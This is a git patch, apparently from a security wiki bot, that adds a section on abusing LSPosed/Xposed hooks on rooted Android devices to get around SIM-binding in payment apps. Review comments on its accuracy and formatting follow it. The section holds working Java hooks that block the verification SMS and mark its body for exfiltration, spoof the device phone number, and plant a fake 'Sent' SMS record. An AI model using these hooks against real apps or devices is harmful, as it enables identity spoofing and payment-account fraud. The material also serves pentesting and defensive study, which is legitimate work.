From 39e0d0dd0cc992c00a44cb30afafa84f5d6b5e36 Mon Sep 17 00:00:00 2001
From: HackTricks News Bot
Date: Thu, 19 Mar 2026 13:06:19 +0000
Subject: [PATCH] Add content from: Weaponizing LSPosed: Remote SMS Injection and Identity Spoof...

---
 ...-instrumentation-and-ssl-pinning-bypass.md | 65 ++++++++++++++++++-
 1 file changed, 64 insertions(+), 1 deletion(-)

diff --git a/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md b/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md
index 16214ecfe2d..d0afb21eb37 100644
--- a/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md
+++ b/src/mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md
@@ -334,6 +334,69 @@ apk-mitm app.apk install-burp-certificate.md {{#endref}} + +## LSPosed/Xposed Hooking Abuse (Telephony/SMS) + +On rooted devices, LSPosed/Xposed modules can hook Java telephony/SMS APIs at runtime, keeping the APK unmodified on disk while fully controlling what the app sees. This is commonly abused to bypass SIM‑binding flows that trust local telephony APIs or local SMS provider state. + +Key primitives +- **Suppress outgoing verification SMS** while exfiltrating the token by short‑circuiting `SmsManager.sendTextMessage` in `beforeHookedMethod`. +- **Spoof MSISDN/line number** by forcing `TelephonyManager.getLine1Number()` and `SubscriptionInfo.getNumber()` to return an attacker‑controlled value. +- **Plant a fake “Sent” record** in the SMS provider so apps that check local SMS history see a successful send even if the carrier never received it. + +Example: block SMS dispatch and capture content +```java +XposedHelpers.findAndHookMethod( + "android.telephony.SmsManager", + lpparam.classLoader, + "sendTextMessage", + String.class, String.class, String.class, PendingIntent.class, PendingIntent.class, + new XC_MethodHook() { + protected void beforeHookedMethod(MethodHookParam param) { + String body = (String) param.args[2]; + // exfiltrate body to operator channel + param.setResult(null); // suppress real SMS send + } + } +); +``` + +Example: spoof device phone number +```java +XposedHelpers.findAndHookMethod( + "android.telephony.TelephonyManager", + lpparam.classLoader, + "getLine1Number", + new XC_MethodHook() { + protected void afterHookedMethod(MethodHookParam param) { + param.setResult(spoofedMsisdn); + } + } +); +``` +```java +XposedHelpers.findAndHookMethod( + "android.telephony.SubscriptionInfo", + lpparam.classLoader, + "getNumber", + new XC_MethodHook() { + protected void afterHookedMethod(MethodHookParam param) { + param.setResult(spoofedMsisdn); + } + } +); +``` + +Example: inject a fake “Sent” SMS record +```java +ContentValues v = 
new ContentValues(); +v.put("address", dest); +v.put("body", body); +v.put("type", 2); // sent +v.put("status", 0); // success +context.getContentResolver().insert(Uri.parse("content://sms/sent"), v); +``` + ## Handy command cheat‑sheet ```bash @@ -396,5 +459,5 @@ Notes - [phantom-frida (stealth Frida server builder)](https://github.com/TheQmaks/phantom-frida) - [Frida OkHttp4 SSL pinning bypass script](https://github.com/Zero3141/Frida-OkHttp-Bypass) - [XDA guide to strong Play Integrity bypass (2025)](https://xdaforums.com/t/updated-11-17-2025-guide-get-strong-integrity-fix-banking-apps-revolut-google-wallet-android-16-working.4753805/) - +- [Weaponizing LSPosed: Remote SMS Injection and Identity Spoofing in Modern Payment Ecosystems](https://www.cloudsek.com/blog/weaponizing-lsposed-remote-sms-injection-and-identity-spoofing-in-modern-payment-ecosystems-2) {{#include ../../banners/hacktricks-training.md}}
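Review bot: in the first hunk (`@@ -334,6 +334,69 @@`), the fake "Sent" record example (`v.put("type", 2)` through `insert(Uri.parse("content://sms/sent"), v)`) never says which process it runs in, and that matters: since Android 4.4 the SMS provider only accepts writes from the default SMS app, so the insert is refused if the hook simply executes inside an ordinary target app. State the required context explicitly (rooted device plus a privileged or default-SMS-app process), since the section's opening sentence only mentions root. The snippets also use `lpparam`, `spoofedMsisdn`, `dest`, `body` and `context` without declaring them; add a sentence saying they are placeholders for the module's `LoadPackageParam`, the spoofed number and the target app's `Context`, or declare them before the first block. Lastly, the section would be more useful with the defensive counterpart its own text implies: it says the affected flows are those that "trust local telephony APIs or local SMS provider state", so a one-line note that SIM binding must be confirmed server-side (the backend verifies receipt of the verification SMS rather than the app checking `getLine1Number()`, `getNumber()` or local SMS history) and that LSPosed presence belongs among the hooking-framework checks this anti-instrumentation page covers would round it out. Minor: the new prose uses non-breaking hyphens (`SIM‑binding`, `short‑circuiting`, `attacker‑controlled`) and curly quotes around "Sent"; plain ASCII is easier to grep and matches the rest of the file.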
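Review bot: the reference hunk (`@@ -396,5 +459,5 @@`) replaces the blank line before `{{#include ../../banners/hacktricks-training.md}}` (the `-` line followed by `+- [Weaponizing LSPosed: ...]`) instead of inserting the new entry above it, so the banner include now sits directly under the last list item and, as a lazy continuation line in CommonMark, gets absorbed into that item. Keep the separating blank line after the new reference so the include stays its own block. The entry itself matches the source named in the commit subject.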